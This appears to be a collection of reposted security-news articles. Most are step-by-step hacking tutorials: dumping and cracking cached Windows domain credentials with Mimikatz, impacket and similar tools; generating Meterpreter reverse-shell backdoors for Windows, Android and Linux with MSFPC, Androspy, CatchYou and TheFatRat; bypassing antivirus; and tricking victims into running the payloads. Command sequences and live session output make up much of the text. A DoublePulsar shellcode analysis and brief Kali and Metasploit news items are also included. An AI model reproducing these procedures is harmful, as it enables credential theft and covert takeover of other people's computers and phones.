To generate hashes the MSCACHE algorithm is used, which are stored locally in the registry of the Windows operating system (by default, the last 10 hashes). There are two versions of MSCASH/MSCACHE (or DCC):

• MSCACHEV1 or DCC1 used before Windows Vista and Server 2003
• MSCACHEV2 or DCC2 used after Windows Vista and Server 2003

This time, network security specialists from the International Institute of Cyber Security (IICS) will show you a method to extract accounts from the domain cache, in addition to some ways to extract hashing passwords by exploiting a domain user.

Metasploit

Metasploit is a tool that allows pentesters to retrieve MSCACHE hashes stored on a Windows system. The corresponding module retrieves domain hashes that were cached as a result of a Group Policy setting. According to network security experts, Windows systems store information about the last 10 successful authorizations by default:

use post/windows/gather/cachedump
set session 2
exploit 

Based on the results of the module development, password hashes are downloaded from DCC2/MSCACHE, as shown in the following screenshot:

Impacket

This information can also be retrieved using Python and impacket libraries. Remember that before using this technique, you will need to save the system and security log branches locally by using the following commands:

reg save hklm\system c:\system
reg save hklm\security c:\secuirty 

Next, copy the resulting files to the impacket location. In this example, the copy occurs on a system with Kali Linux. Then, to extract the DCC2/MSCACHE hashes, use the following command:

python secretsdump.py -security -system system LOCAL

The result of running this script is shown in the following screenshot:

Mimikatz

Network security researchers mention that Mimikatz is one of the best pentesting and account extraction utilities in Windows. To extract the hashes from DCC2/MSCACHEv2, you need to install Mimikatz on the compromised system and run the following command:

privilege::debug
token::elevate
lsadump::cache

The result of running the above commands is shown below:

PowerShell Empire

Experts mention that PowerShell Empire has a module for extracting MSCACHEV2 hashes from the registry of a compromised machine. To use PowerShell Empire on your local system, you can download and run the commands on the target system to use the back module and then enter a new command:

usemodule credentails/mimikatz/cache
set agent <agent_id>
execute

The results of the module’s work on downloading MSCACHEv2 hashes are shown in the following screenshot:

Koadic

As with Powershell Empire, you can use the Koadic utility to extract DCC2 hashes using the following module:

use mimikatz_dotnet2js
set MIMICMD lsadump::cache

The results are shown in the following screenshot:

Python scripts

As in the impacket example, you can use the mscache.py script to retrieve the hashes from MSCACHEV2. Download the script from GitHub, and during startup, specify the paths to the uploaded files as parameters:

python mscache.py --security /root/Desktop/security –system /root/Desktop/system

The result of running this script is shown below:

Decryption of received hashes

As mentioned by network security experts, these hashes are not used during hash pass attacks, so an additional tool for decryption, such as John the Ripper, will be required:

john --format=mscasch2 --wordlist=/usr/share/wordlists/rockyou.txt mhash

As a result, we get the clear text password for the specified hash. Try not to get confused between DCC2 and MSCACHEV2/MSCASH. These hashes are identical and can be extracted using the above techniques.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post Top 6 tools used by hackers for stealing Windows domain cache credentials. 5 alternatives of Mimikatz appeared first on Information Security Newspaper | Hacking News.

MSFvenom Payload Creator (MSFPC) payload creator. MSFPC can generate different payloads of Windows, Android, Linux in a minute. It is easy way to generate Meterpreter payloads using MSFvenom (part of the Metasploit framework). This tool makes it easier to use to create a payload and exploit the victim’s machine. MSFPC can automatically identify the interface, IP address, etc. Earlier researchers of International Institute of Cyber Security demonstrated many other payloads that are FUD (Fully Undetectable). This MSFPC is a pre-installed tool in kali Linux. 

Environment

• OS: Kali Linux 2020 64bit
• Kernel version: 5.6.0

Execution Steps

• Use this command to find the help option msfpc -h

Generate Windows Payload

• Now use this command to generate the payload, msfpc <TYPE> (<DOMAIN/IP>) (<PORT>)
• Command to run, msfpc windows 192.168.0.51 4444

• Now, open the another terminal and run this command msfconsole -q -r ‘/home/iicybersecurity/windows-meterpreter-staged-reverse-tcp-4444-exe.rc’ to start the handler.

• For testing send this malicious exe file generated to the victim.

• If victim executes the exe file, we can access the victim machine.

• Successfully we got the session and we are able to access the victim’s machines.

Generate Android Payload

• Now, let’s exploit the android phone using MSFPC.
• Create apk file by using this command msfpc apk 192.168.0.51 5555

• Successfully created the payload.
•  Next start the handler by using this command, msfconsole -q -r ‘/home/iicybersecurity/android-meterpreter-stageless-reverse-tcp-5555-apk.rc’

• Now send the apk file to victim. If victim install the apk file, in his mobile.

•  In the hackers machines session will be opened.

• Successfully we are able to access victims mobile.

Generate Linux Payload

• Now let’s exploit Linux machine using MSFPC
• Use this command to exploit Linux machine, msfpc bash 192.168.0.51 2222

• Successfully created the payload.
• Next use this command to start the handler, msfconsole -q -r ‘/home/iicybersecurity/bash-shell-staged-reverse-tcp-2222-sh.rc’

• Now, send the malicious file to victim.
• If the victim executes this commands in machine
  • Chmod +x bash-shell-staged-reverse-tcp-2222.sh
  • ./ bash-shell-staged-reverse-tcp-2222.sh
• Automatically session will be started in the hacker’s machine.

• Successfully exploited linux machine.

Conclusion

As we saw, how to create payload and exploit Windows, Linux, and Android using MSFPC. This MSFPC makes it easy for hackers to use and without remembering the commands.

The post Now Generate Android, Windows, Linux Payload in a Minute appeared first on Information Security Newspaper | Hacking News.

Hacking any Android device is fun, but how hacker do it. There are many ways to get into mobile device, “some which require high level of technical knowledge and some require basic technical knowledge”, as commented by researcher of International Institute of Cyber Security. The ones that require high technical knowledge are RCE, Zero-day and the ones that require basic technical knowledge are presented here in a step by step manner.

Today we will talk about Androspy, it is very useful tool for exploiting any android phone by simply generating malicious APK and backdoor. APK is the package file format of Android. This tool also can encrypts the payload. Androspy is easy to use and there is not need to remember the command to attack the victim. Later we will also explain on how to prevent your Android device from these hacks.

Environment

• OS: Parrot 64bit
• Kernel version: 5.2.0

Installation steps

• Use this command to clone the project.
• git clone https://github.com/Cyb0r9/Androspy

┌─[root@parrot]─[/home/iicybersecurity]
└──╼ #git clone https://github.com/Cyb0r9/Androspy
Cloning into 'Androspy'...
remote: Enumerating objects: 66, done.
remote: Total 66 (delta 0), reused 0 (delta 0), pack-reused 66
Unpacking objects: 100% (66/66), done.

• Use the cd command to enter into androspy directory

┌─[root@parrot]─[/home/iicybersecurity]
└──╼ #cd Androspy/
┌─[root@parrot]─[/home/iicybersecurity/Androspy]
└──╼ #

• Use this command to give file permission chmod +x setup.sh
• Now, use this command to install the dependencies ./setup.sh

┌─[root@parrot]─[/home/iicybersecurity/Androspy]
└──╼ #./setup.sh
 update []
Get:1 https://deb.parrot.sh/parrot rolling InRelease
Hit:2 https://deb.parrot.sh/parrot rolling-security InRelease
Get:3 https://deb.parrot.sh/parrot rolling/main amd64 Packages [17.1 MB]
Get:4 https://deb.parrot.sh/parrot rolling/main i386 Packages [17.0 MB]
Get:5 https://deb.parrot.sh/parrot rolling/contrib amd64 Packages [139 kB]
============================================================================================================SNIP============================================================================================================================
Reading state information... Done
1930 packages can be upgraded. Run 'apt list --upgradable' to see them.
 keytool []
 jarsigner []
 Apache2 []
 Metasploit-Framework []
 xterm []

• Next, use this command to give file permission chmod +x androspy.sh
• Now, use this command to launch the tool.

• Successfully launched the tool.

• Now, enter the LHOST (IP address) and port number. LHOST is Local Host IP, IP address of your Parrot OS.
• Then enter the payload name.

• After that, we get an option to encrypt the payload. Choose the required option.
• Then it asks users to enter the password with few details like name, organization, and location, and when we finish type yes and enter.
• Once we click enter, we will get a popup “Hello World” close it.
• After that, we will get “Your Payload Has Been Successfully Encrypted”

• Then it displays two URLs target and TinyURL and enter Y to start the listener.
• Next, we get a new tab named IP posiner.
• Now send the APK file to the victim which is located in androspy directory using social engineering. You can also send tiny URL to victim.
• If the victim installs the APK file in mobile, he will get this below screen.

• After installing the APK file. Hacker sitting on Parrot OS we get the session or complete control of victim mobile.

• Successfully we got the access of victim phone.
• As it shows that the Victim mobile is Android 7.1.2

Conclusion

As we saw, how easy is to compromise any android phone using androspy tool by simply generating malicious APK and send to victim for installation. So it is always recommended to not install any APK file you receive on whatsapp or any other social medium. If you want to install any software always do it from Android Play store.

The post How to Hack Any Android Mobile using Androspy – Step by Step appeared first on Information Security Newspaper | Hacking News.

When a hacker sends any malicious file to the victim, most of the tool doesn’t bypass the antivirus (AV) protection. But today we will talk about a tool that can bypass the antivirus protection and compromise the victim’s machine. Ethical hacking researcher are always finding easy ways to bypass Antivirus protection, however there are many more way to bypass antivirus protection.

Now coming to a tool called CatchYou, it’s a social engineering tool which can be used to compromise any windows machine by sending one link to the victim. In this tool, we are using Metasploit Framework to exploit the victim’s machine and Ngrok server as reverse proxy to access private machines on network. This CatchYou tool is easy to install and we will demonstrate the working of this tool in step by step manner.

Environment

• OS: Kali Linux 2019.3 64 bit
• Kernel-version: 5.2.0

Installation Steps

• Use this command to clone the project.
• git clone https://github.com/thelinuxchoice/catchyou

 root@kali:/home/iicybersecurity# git clone https://github.com/thelinuxchoice/catchyou
Cloning into 'catchyou'...
remote: Enumerating objects: 26, done.
remote: Counting objects: 100% (26/26), done.
remote: Compressing objects: 100% (25/25), done.
remote: Total 26 (delta 10), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (26/26), 21.74 KiB | 53.00 KiB/s, done.

• Use the cd command to enter into catchyou directory.

root@kali:/home/iicybersecurity# cd catchyou/
root@kali:/home/iicybersecurity/catchyou#

• Now, use this command to launch this tool.

• Here, choose the payload option to exploit the victim’s machine.

• Here, it will generate two files catchyou.exe and index.php

• Now we selected windows shell reverse_tcp and enter the LHOST and LPORT.
• Here we can see that the payload is saved as catchyou.exe and it started the Metasploit Listener by selecting option Y
• catchyou.exe file will be saved in catchyou directory.
• Now send this exe file to the victim by using Pendrive or by sending URL using social engineering.
• For sending URL using social engineering, we can also Pwndrop tool.
• pwndrop tool can be used to host your own server and send any file very securely to another person, can be malicious file also.
• Click here to follow pwndrop setup.
• Here, we used pwndrop tool to send the URL to victim. Once the Victim click on the URL, it downloads the FUD payload. As shown below.

• If the victim opens this exe file on his machine, we will get the shell of victims machine.

Conclusion

We saw on how easy is to compromise the victim’s computer by sending the URL or malicious file to the victim. DO NOT UPLOAD THE PAYLOAD GENERATED ON VIRUSTOTAL.

The post Bypass Antivirus with Fully Undetectable(FUD) payload – Step By Step appeared first on Information Security Newspaper | Hacking News.

The latest version of the operating system has multiple upgrades and updates

Network security and ethical hacking specialists from the International Institute of Cyber Security report about the upcoming release of Kali Linux 2019.1, the most requested operating system by pentesters and information security enthusiasts.

This Debian GNU/Linux-based operating system will be launched with Metasploit 5.0, which is considered by many network security specialists to be one of the most trusted frameworks for penetration testing available on the market.

The tool has been improved in various respects, featuring a new JSON-RPC daemon, a new search engine and new evasion modules, writing support for Shell code in C and integrated web services.

Since its launch in 2013, Kali Linux has earned a place among the cybersecurity community, providing a series of pre-installed tools within a single operating system. This latest version of the system has several bug fixes and updates for multiple tools, such as DBeaver, Binwalk, among others.

According to network security specialists, the operating system also has an updated kernel that supports the use of single-plate Banana Pi and Banana Pro equipment.

In addition, the images of the Raspberry Pi have been simplified even more to help choose one with ease. The latest version of Kali Linux is available for general use and can be downloaded from their official website.

The post New version of Kali Linux 2019.1 with Metasploit 5.0 available appeared first on Information Security Newspaper | Hacking News.

According to ethical hacking researcher of International Institute of Cyber Security did a detailed analysis on the working of TheFatRat to check on the insides of pentesting tool.

TheFatRat is an another metasploit like tool which is used to generate backdoor easily. This tool is used to compile some of the malware with some popular payloads which then can be used to attack operating systems like Windows, MAC, Linux. This tool gives many options like creating backdoors, infected dlls, as per ethical hacking investigation..

The whole tool has been tested on Parrot OS. And after creating backdoors. These backdoors has been opened on Windows 10 Build 1607 and android.

• For cloning type https://github.com/Screetsec/TheFatRat.git
• Then type cd TheFatRat
• Type chmod u+x setup.sh
• Type ./setup.sh
• If mono does not install type sudo apt-get update and sudo apt-get install mono-mcs or type sudo apt-get install mono-devel or type sudo apt-get install mono-complete
• As some of the dependencies related to mono does no install directly. so simply run above commands.
• In installation phase it will ask to create shortcut in parrot OS. Simply type y  after installation you can run fatrat just like you run msfconsole.
• After then type fatrat

• As you can TheFatRat gives tons of options to create session in target windows or other platforms.

Creating An Simple Exploit To Hack Windows 10 :-

• Type 6 will create fud backdoor using pwnwinds.

• Then type 2 which will create fud backdoor using c# + powershell.

• Enter LHOST listener/attacker IP address. Type 192.168.1.12
• Type port 4444 or any port number.
• Enter backdoor file name tstfile

• Type 3 for using windows/meterpreter/reverse_tcp.

• Press enter for creating backdoor.

• After backdoor is creating it will save in /home/user/Downloads/TheFatRat/output/tstfile.exe
• For accessing backdoor go to above location.

• Open another terminal and start msfconsole. Msfconsole wiil be used to handle ongoing session.
• Type msfconsole
• After msfconsole has started type use exploit/multi/handler
• Then type set payload windows/meterpreter/reverse_tcp
• Type LHOST 192.168.1.12
• Type LPORT 4444
• Type exploit

msf5 > use exploit/multi/handler
 msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
 payload => windows/meterpreter/reverse_tcp
 msf5 exploit(multi/handler) > set LHOST 192.168.1.12
 LHOST => 192.168.1.12
 msf5 exploit(multi/handler) > set LPORT 4444
 LPORT => 4444
 msf5 exploit(multi/handler) > exploit

• Now for opening backdoor in Windows 10. Simply copy from here and paste to pendrive and open pendrive in Windows 10. You can also use any social engineering technique (like by Fake any website in seconds) to pass this exe to TARGET computer.
• You have to copy two files tstfile.exe and program.cs. As this backdoor has created using C#
• And then double click on tstfile.exe

• As target click on the file a popup will came out and then meterpreter session will be opened.

• As shown below meterpreter session has started in msfconsole.

msf5 exploit(multi/handler) > exploit
 [] Started reverse TCP handler on 192.168.1.12:4444 [] Sending stage (179779 bytes) to 192.168.1.5
 [*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.5:61050) at 2019-01-30 12:24:04 +0000
 meterpreter > sysinfo
 Computer        : DESKTOP-2304ULE
 OS              : Windows 10 (Build 16299).
 Architecture    : x64
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows
 meterpreter >

• The above target is using Widnows 10. As session has created attacker can perform various tasks.

Creating Backdoor easily with another option (with C code):-

• Type 6

• Type 6

• Type 6

• Enter LHOST listener/attacker IP address. Type 192.168.1.12
• Type port 4444 or any port number.
• Enter backdoor file name tstfile
• Press enter to create backdoor.
• Open another terminal and start msfconsole. Msfconsole wiil be used to handle ongoing session.
  
• Type msfconsole
  
• After msfconsole has started type use exploit/multi/handler
  
• Then type set payload windows/meterpreter/reverse_tcp
  
• Type LHOST 192.168.1.12
  
• Type LPORT 4444
  
• Type exploit

msf5 > use exploit/multi/handler
 msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
 payload => windows/meterpreter/reverse_tcp
 msf5 exploit(multi/handler) > set LHOST 192.168.1.12
 LHOST => 192.168.1.12
 msf5 exploit(multi/handler) > set LPORT 4444
 LPORT => 4444
 msf5 exploit(multi/handler) > exploit

• As target open malicious file (tstfile.exe) in windows 10. A meterpreter session will start.

[] Started reverse TCP handler on 192.168.1.12:4444 [] Sending stage (179779 bytes) to 192.168.1.5
 [*] Meterpreter session 2 opened (192.168.1.12:4444 -> 192.168.1.5:61331) at 2019-01-30 15:19:28 +0000
 meterpreter > 

• As you can see meterpreter session has start in attacker machine. Now attacker can easily manipulate target.

Creating Backdoor Using Apache + Powershell :-

• Type 6

• Type 3

• Enter LHOST listener/attacker IP address. Type 192.168.1.12
• Type port 4444 or any port number.
• Enter backdoor file name tstfile1

• Type 3
• Press enter to create backdoor.

• Open above created backdoor in Windows 10. Or trick your target to open above file in their pc.
• Open another terminal and start msfconsole. Msfconsole wiil be used to handle ongoing session.
  
• Type msfconsole
  
• After msfconsole has started type use exploit/multi/handler
  
• Then type set payload windows/meterpreter/reverse_tcp
  
• Type LHOST 192.168.1.12
  
• Type LPORT 4444
  
• Type exploit
• As target opens backdoor (tstfile1.exe) a new session will be created in windows

 [] Sending stage (179779 bytes) to 192.168.1.5 [] Meterpreter session 3 opened (192.168.1.12:4444 -> 192.168.1.5:61336) at 2019-01-30 15:20:01 +0000
meterpreter > 

The difference between backdoors are that 1st backdoor uses c# + powershell where you files to the target. And second backdoor where you have to simply choose the options to create backdoor. As another backdoor requires to set payload. And the third where the backdoor uses a webserver apache to create backdoor. The third backdoor makes a strong backdoor for attackers. The session does not get expired easily. As the above two expires session suddenly while testing, according to ethical hacking courses.

Inject Using PHP:-

• Here we will create backdoor using php. Type 1

• Then type 5
• Type LHOST 192.168.1.7
• Then type port 80
• Enter file name tstfile

• As shown in the above image. This backdoor is using windows payload for creating an session.
• After payload has created. Move payload to apache server location. As this payload will be opened using Ip address.
• Type cp tstfile.php /var/www/html
• Then type sudo serivce apache2 start
• Then go to target windows browser and type 192.168.1.7/tstfile.php

• As target open above URL. A php script will start in background and session will start as shown below.

 
[*] Meterpreter session 1 opened (192.168.1.12:80 -> 192.168.1.5:61331) at 2019-01-30 17:45:28 +0000 
Id                       Information                   Connection 
 ------                   ------------                 -----------
 1 meterpreter php/linux www-data (33) @apache2  192.168.1.7:80 -> 192.178.1.5:61331
 
msf exploit(handler) > session -i 1
 meterpreter > sysinfo
 Computer        : DESKTOP-2304ULE
 OS              : Windows 10 (Build 16299).
 Architecture    : x64
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows
 meterpreter > 

• After opening just a URL. Target can easily got hacked.

Attacking An Android Device :-

• Type 1

• Type 192.168.1.7
• Type 4444
• Then backdoor
• Type 3

• Press enter to create backdoor.
• This is create a infected .apk file

• We will open backdoor in android mobile. Here we have use Android 4.4 Lolipop.
• Create an multi handler inside msfconsole.
• Type use exploit/multi/handler
• Type set payload android/meterpreter/reverse_tcp
• Type set 192.168.1.7
• Type set 4444
• Type exploit

msf5 > use exploit/multi/handler
 msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
 payload => android/meterpreter/reverse_tcp
 msf5 exploit(multi/handler) > set LHOST 192.168.1.7
 LHOST => 192.168.1.7
 msf5 exploit(multi/handler) > set LPORT 4444
 LPORT => 4444
 msf5 exploit(multi/handler) > exploit

• Install the above backdoor.apk

• As backdoor.apk is opened in android a new session will be created in msfconsole. As per digital forensic expert from International Institute of Cyber Security users should be cautious while downloading any new Android app, as it can be android trojan.

[] Started reverse TCP handler on 192.168.1.7:4444 [] Sending stage (70554 bytes) to 192.168.1.12
 [*] Meterpreter session 1 opened (192.168.1.7:4444 -> 192.168.1.12:58445) at 2019-01-31 02:04:20 +0000
 meterpreter > help
 Core Commands
 Command                   Description -------                   ----------- ?                         Help menu background                Backgrounds the current session bg                        Alias for background bgkill                    Kills a background meterpreter script bglist                    Lists running background scripts bgrun                     Executes a meterpreter script as a background thread channel                   Displays information or control active channels close                     Closes a channel disable_unicode_encoding  Disables encoding of unicode strings enable_unicode_encoding   Enables encoding of unicode strings exit                      Terminate the meterpreter session get_timeouts              Get the current session timeout values guid                      Get the session GUID help                      Help menu info                      Displays information about a Post module irb                       Open an interactive Ruby shell on the current session load                      Load one or more meterpreter extensions machine_id                Get the MSF ID of the machine attached to the session pry                       Open the Pry debugger on the current session quit                      Terminate the meterpreter session read                      Reads data from a channel resource                  Run the commands stored in a file run                       Executes a meterpreter script or Post module sessions                  Quickly switch to another session set_timeouts              Set the current session timeout values sleep                     Force Meterpreter to go quiet, then re-establish session. transport                 Change the current transport mechanism use                       Deprecated alias for "load" uuid                      Get the UUID for the current session write                     Writes data to a channel

• Type sysinfo

meterpreter > sysinfo
 Computer    : localhost
 OS          : Android 4.4.2 - Linux 3.10.52-android-x86+ (i686)
 Meterpreter : dalvik/android
 meterpreter >

• As the attacker can take advantage of target android device.

The post Hack Windows, Android, Mac using TheFatRat (Step by Step tutorial) appeared first on Information Security Newspaper | Hacking News.

Side note: You can use my MS17-010 Metasploit auxiliary module to scan your networks for systems missing this patch (uncredentialed and non-intrusive). If a missing patch is found, it will also check for an existing DoublePulsar infection.

Introduction

For those unfamiliar, DoublePulsar is the primary payload used in SMB and RDP exploits in FuzzBunch. Analysis was performed using the EternalBlue SMBv1/SMBv2 exploit against Windows Server 2008 R2 x64.

The shellcode, in tl;dr fashion, essentially performs the following:

• Step 0: Shellcode sorcery to determine if x86 or x64, and branches as such.
• Step 1: Locates the IDT from the KPCR, and traverses backwards from the first interrupt handler to find ntoskrnl.exe base address (DOS MZ header).
• Step 2: Reads ntoskrnl.exe’s exports directory, and uses hashes (similar to usermode shellcode) to find ExAllocPool/ExFreePool/ZwQuerySystemInformation functions.
• Step 3: Invokes ZwQuerySystemInformation() with the enum value SystemQueryModuleInformation, which loads a list of all drivers. It uses this to locate Srv.sys, an SMB driver.
• Step 4: Switches the SrvTransactionNotImplemented() function pointer located at SrvTransaction2DispatchTable[14] to its own hook function.
• Step 5: With secondary DoublePulsar payloads (such as inject DLL), the hook function sees if you “knock” correctly and allocates an executable buffer to run your raw shellcode. All other requests are forwarded directly to the original SrvTransactionNotImplemented() function. “Burning” DoublePulsar doesn’t remove this hook, just makes it dormant.

Honestly, you don’t usually wake up in the morning and feel like spending time dissecting ~3600 some odd bytes of Ring-0 shellcode, but I felt productive today. Also I was really curious about this payload and didn’t see very many details about it outside of Countercept’s analysis of the DLL injection code. But I was interested in how the initial SMB backdoor is installed, which is what this post is about.

Zach Harding, Dylan Davis, and I kind of rushed through it in a few hours in our red team lab at RiskSense. There is some interesting setup with the IA32_LSTAR MSR (0xc000082) and a region of the Srv.sys containing FEFE’s, but we don’t talk about such things… Much like the EXTRABACON shellcode, this one is crafty and does not simply spawn a shell.

Detailed Shellcode Analysis

Inside the Shadow Brokers dump you can find DoublePulsar.exe and EternalBlue.exe. When you use DoublePulsar in FuzzBunch, there is an option to spit its shellcode out to a file. We found out this is a red herring, and that the EternalBlue.exe contained its own payload.

Step 0: Determine CPU Architecture

The main payload is quite large because it contains shellcode for both x86 and x64. The first few bytes use opcode trickery to branch to the correct architecture (see my previous article on assembly architecture detection).

Here is how x86 sees the first few bytes.

You’ll notice that inc eax means the je (jump equal/zero) instruction is not taken. What follows is a call and a pop, which is to get the current instruction pointer.

And here is how x64 sees it:

The inc eax byte is instead the REX preamble for a NOP. So the zero flag is still set from the xor eax, eax operation. Since x64 has RIP-relative addressing it doesn’t need to get the RIP register.

The x86 payload is essentially the same thing as the x64 so this post only focuses on x64.

Since the NOP was a true NOP on x64, I overwrote the 40 90 with cc cc (int 3) using a hex editor. Interrupt 3 is how debuggers set software breakpoints.

Now when the system is exploited, our attached kernel debugger will automatically break when the shellcode starts executing.

Step 1: Find ntoskrnl.exe Base Address

Once the shellcode figures out it is x64 it begins to search for the base of ntoskrnl.exe. This is done with the following stub:

Fairly straightforward code. In user mode, the GS segment for x64 contains the Thread Information Block (TIB), which holds the Process Environment Block (PEB), a struct which contains all kinds of information about the current running process. In kernel mode, this segment instead contains the Kernel Process Control Region (KPCR), a struct which at offset zero actually contains the current process PEB.

This code grabs offset 0x38 of the KPCR, which is the “IdtBase” and contains a pointer struct of KIDTENTRY64. Those familiar with the x86 family will know this is the Interrupt Descriptor Table.

At offset 4 into the KIDENTRY64 struct you can get a function pointer to the interrupt handler, which is code defined inside of ntoskrnl.exe. From there it searches backwards in memory in 0x1000 increments (page size) for the .exe DOS MZ header (cmp bx, 0x5a4d).

Step 2: Locate Necessary Function Pointers

Once you know where the MZ header of a PE file is, you can peek into defined offsets for the export directory and get the relative virtual address (RVA) of any function you want. Userland shellcode does this all the time, usually to find necessary functions it needs out of ntdll.dll and kernel32.dll. Just like most userland shellcode, this ring 0 shellcode also uses a hashing algorithm instead of hard-coded strings in order to find the necessary functions.

The following functions are found:

• ZwQuerySystemInformation
• ExAllocatePool
• ExFreePool

ExAllocatePool can be used to create regions of executable memory, and ExFreePool can clean it up when done. These are important so the shellcode can allocate space for its hooks and other functions. ZwQuerySystemInformation is important in the next step.

Step 3: Locate Srv.sys SMB Driver

A feature of ZwQuerySystemInformation is a constant named SystemQueryModuleInformation, with the value 0xb. This gives a list of all loaded drivers in the system.

The shellcode then searched this list for two different hashes, and it landed on Srv.sys, which is one of the main drivers that SMB runs on.

The process here is basically equivalent to getting PEB->Ldr in userland, which lets you iterate loaded DLLs. Instead, it was looking for the SMB driver.

Step 4: Patch the SMB Trans2 Dispatch Table

Now that the DoublePulsar shellcode has the main SMB driver, it iterates over the .sys PE sections until it gets to the .data section.

Inside of the data section is generally read/write memory, and stored here is the SrvTransaction2DispatchTable, an array of function pointers that handle different SMB tasks.

The shellcode allocates some memory and copies over the code for its function hook.

Next the code stores the function pointer for the dispatch named SrvTransactionNotImplemented() (so that it can call it from within the hook code). It then overwrites this member inside SrvTransaction2DispatchTable with the hook.

That’s it. The backdoor is complete. Now it just returns up its own call stack and does some small cleanup chores.

Step 5: Send “Knock” and Raw Shellcode

Now when DoublePulsar sends its specific “knock” requests (which are seen as invalid SMB calls), the dispatch table calls the hooked fake SrvTransactionNotImplemented() function. Odd behavior is observed: normally the SMB response MultiplexID must match the SMB request MultiplexID, but instead it is incremented by a status code (with 0x10 being “success”).

If you “knock” correctly, the backdoor will allocate an executable region of memory, copy over any shellcode you want, and run it. For instance, the Inject DLL payload in the framework is simply some DLL loading shellcode prepended to the DLL you actually want to inject.

Here is the disassembly of the hook function, which is installed at SrvTransaction2DispatchTable+0x70 (112/8 = index 14):

Another thing to note, when we “burned” DoublePulsar (sent it the “uninstall” command from the framework), it did not restore the original SrvTransactionNotImplemented() function in the SrvTransaction2DispatchTable dispatch table. Instead, the hook remained but merely laid dormant, jumping over its “knock”/shellcode running section.

Conclusion

There you have it, a sophisticated, multi-architecture SMB backdoor. It’s a pretty cool payload, because you can infect a system, lay low for a little bit, and come back later when you want to do something more intrusive. It also finds a nice place in the system to hide out and not alert built-in defenses like PatchGuard.

Source:https://zerosum0x0.blogspot.in/2017/04/doublepulsar-initial-smb-backdoor-ring.html

The post DoublePulsar Initial SMB Backdoor Ring 0 Shellcode Analysis appeared first on Information Security Newspaper | Hacking News.

To exploit a system using the Metasploit Framework you carry out 5 steps:
1. Choose then configuring a pre loaded exploit in the database.
2. Check to see if the target system is susceptible to the exploit.
3. Configuring a payload
4. Encode the payload in order to hide it from an intrusion-prevention system (IPS)
5. Execute the exploit.

In order for you to choose an exploit and a payload, information about the target is required. There are many ways to gain this information from port scanning and OS fingerprinting tools such as Nmap or vulnerability scanners such as Nessus. I’ll leave your method of information gathering up to you.

Installation

Installation of the Metasploit framework is dependant on your Operating System and hardware therefore rather than list the ways to install to save covering all eventualities I have provided a link to both windows and Linux installations:

Windows: LINK…
Linux : LINK…

I would however highly recommend that you download Kali-Linux which comes with Metasploit Pro already installed.

Usage

Metasploit is a great tool and a must have for all secutiry/penetration testers. I will show you a few ways in which metasploit can be used to exploit a target machine. (All my examples are done using Metasploit on Kali-Linux exploiting a Windows XP SP3 OS)

Exploit Ms08_067_netapi.

How to connect and exploit a target machine using Metasploit Exploit ms08_067_netapi. So first of lets boot up a version of Metasploit, with the cmd msfconsole:

Now we need to setup our windows exploit with the following commands:
1. use exploit/windows/smb/ms08_067_netapi
2. set payload windows/meterpreter/bind_tcp
3. set RHOST 192.168.0.10 (This IP Address will be your targets IP gained from a scan)
4. exploit (This command carries out the exploit as seen below)

All being well you should have connected to the target and carry out a number of commands. Below is the screenshot command.

And thats it easy!!

There are loads of commands to run under this exploit, just type help and a list will be displayed.
Examples are: Recording audio from microphones, screenshots from their webcam, gathering keystrokes and downloading files.

Social Engineering Example

Next lets see how to gain access to a targets machine using their interaction. Why? I hear you ask, well sometimes its not possible to connect directly for whatever reason lets say “security settings”. The following exploit uses the targets interaction to help us gain access.

So first things first bring up a terminal window and type the command: se-toolkit

Then enter option 1 for social engineering attacks

Now option 4 to create a payload and listener and enter your IP Address.

Now you need to pick the type of payload, we will go with option 2 – Windows Reverse TCP Meterpreter.

Choose option 16 – Backdoor Executable
Leave the port set to 443
(This port is used for secure web browser communication. Data transferred across such connections are highly resistant to eavesdropping and interception which is iroic concidering what we are using it for lol)
And finally start the listener.

Ok so lets recap, we have just created an executable file with a payload hidden within. The next part is a little tricky you need to send the file to the target computer and get them to execute it. For example call it games and give it a nice icon lol.

Before you send the file navigate to were it was created and right click and properties.

Tick the box to allow the file to be executed as a program

So now we wait….. once the target executes the program you will get the following:

From here on in its the usual Meterpreter > prompt
As before you can now run commands like screenshot or shell.
The target is yours!

Armitage

We’ve seen how to use Metasploit via the command line now lets see how to use a graphical version Armitage that lets us achieve the same goal.

Armitage is a GUI way of using metasploit/meterpreter rather than cmd line so lets get started.

First navigate to Applications > Kali Linux > System Services > Metasploit > community / pro start …… this will start the server/database

Then type armitage in the terminal window and accept the default values:

You will probably get a popup asking to start metasploit, click yes
you should now see the following:

Dont worry about the connection refused it just takes a while to load.
Now armitage will boot up if it asks you for the attack computer IP enter your IP Address.
Navigate to the Hosts tab > Nmap Scan > Quick Scan (OS Detect)

From here armitage will scan a range or a sigle IP Address of your choice then present it in the black window. Right click the target and click Scan

When the scan is complete expand the exploit > windows > smb and double click the ms08_67_netapi

This will bring up an attack confirmation window check the details and click launch

Confirmation of a successful exploit will look like this:

You can now right click the target and perform multiple commands

here is an example of the Interact “remote command shell”

Websploit

As an added extra Websploit (below) uses exploits from Metasploit and has its own features as well which is used to scan and analysis remote systems in order to find vulnerabilites. If you enjoyed this article please comment and i will do one for Websploit. Thank you.

Summary

Metasploit is a must have for anyone interested in the world of secutiry, you have just seen a few ways in which it can be used however keep in mind that this has only scratched the surface of the potential of this tool. To find out more please follow the links below.

Source:https://www.hackthis.co.uk

The post Beginners Guide To Metasploit appeared first on Information Security Newspaper | Hacking News.

Recently we reported the news of the availability of a new hardware bridge for Metasploit extension to test hardware, including IoT devices.

We have to consider that IoT devices are pervading our day life such as into modern businesses. IoT devices are enlarging our surface of attack, for this reason, the availability of tools that allow rapidly test them is essential to prevent cyber attacks.

The new Metasploit extension, the Metasploit RFTransceiver radio frequency testing extension, allows researchers to discover security flaws in in IoT radio communications.

“Wireless systems often control alarm systems, surveillance monitoring, door access, server room HVAC controls, and many other areas,” writes Craig Smith, Transportation Research Lead at Rapid7 in a blog announcement today. These same devices can often contain flaws that can be used by attackers, but are unknown to the user.

